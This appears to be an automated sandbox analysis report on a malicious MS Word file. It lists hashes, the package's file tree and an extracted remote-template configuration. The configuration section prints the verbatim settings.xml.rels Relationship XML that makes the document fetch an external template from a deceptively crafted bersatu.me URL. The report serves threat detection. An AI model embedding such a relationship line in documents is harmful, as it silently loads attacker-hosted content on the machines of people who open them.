Malicious
Malicious

3fab4877ff835864fd66c7b3cf1b3d5f

MS Word Document
|
MD5: 3fab4877ff835864fd66c7b3cf1b3d5f
|
Size: 60.24 KB
|
application/msword

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
3fab4877ff835864fd66c7b3cf1b3d5f
Sha1
6b060cd5b095df54f7e58cab454dc5c1adf99ca4
Sha256
eeaa87c9a844002d35868e63e2b52c00e3b6597af063ae32dcf879caa0c4c69d
Sha384
189b2220db2c612ff61e8a537fcdfeff655b7f683252ba1dc4ab6e35af83c732b0e86d1b091a06941446ce1aa78efcc4
Sha512
a6ffef49913cbe037e2a23f517df40c977d489c3a7d80f770ed76ff43b49f5af052090060257348433f13b7403a6eca3c0351e9412fa38635c6817112b5b1fca
SSDeep
1536:/mhJSGUkbPVhPwTmSypn4C1nYLOijq0xzLvG9KNrwgQyD2zerj:/cSUbTwXyR4Qn6PzzzGKMqX3
TLSH
4B43E05DA08114BEFA16627753413A5BF7ACF5878233A90225322A7DCAF70C9DA9C706
File Structure
3fab4877ff835864fd66c7b3cf1b3d5f
Malicious
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
header2.xml.rels
footer2.xml.rels
settings.xml.rels
Malicious
document.xml
footnotes.xml
footer2.xml
footer3.xml
header3.xml
endnotes.xml
header2.xml
media
image1.emf
image2.emf
embeddings
Microsoft_Office_Excel_Worksheet1.xlsx
[Content_Types].xml
_rels
.rels
xl
_rels
workbook.xml.rels
workbook.xml
sharedStrings.xml
worksheets
_rels
sheet1.xml.rels
sheet1.xml
theme
theme1.xml
styles.xml
printerSettings
printerSettings1.bin
customXml
itemProps2.xml
_rels
item3.xml.rels
item2.xml.rels
item1.xml.rels
item1.xml
itemProps1.xml
itemProps3.xml
item3.xml
item2.xml
docProps
thumbnail.wmf
core.xml
app.xml
custom.xml
Microsoft_Office_Excel_Worksheet2.xlsx
[Content_Types].xml
xl
_rels
workbook.xml.rels
workbook.xml
styles.xml
worksheets
sheet2.xml
sheet1.xml
theme
theme1.xml
sharedStrings.xml
printerSettings
printerSettings1.bin
docProps
thumbnail.wmf
core.xml
app.xml
custom.xml
theme
theme1.xml
settings.xml
styles.xml
webSettings.xml
fontTable.xml
docProps
app.xml
core.xml
Malware Configuration - Remote Template
Config. Field
 Value
Target

https://goodnewswithbestpeoplesfrommysideprocessthebestthinkingskillpeoplesfor.docx@bersatu.me/C2CZAM
Path

settings.xml.rels
XPath

/Relationships/Relationship
Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://goodnewswithbestpeoplesfrommysideprocessthebestthinkingskillpeoplesfor.docx@bersatu.me/C2CZAM" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />
Artefacts
Name
 Value
Remote Template - Highly Suspicious

https://goodnewswithbestpeoplesfrommysideprocessthebestthinkingskillpeoplesfor.docx@bersatu.me/C2CZAM
3fab4877ff835864fd66c7b3cf1b3d5f (60.24 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙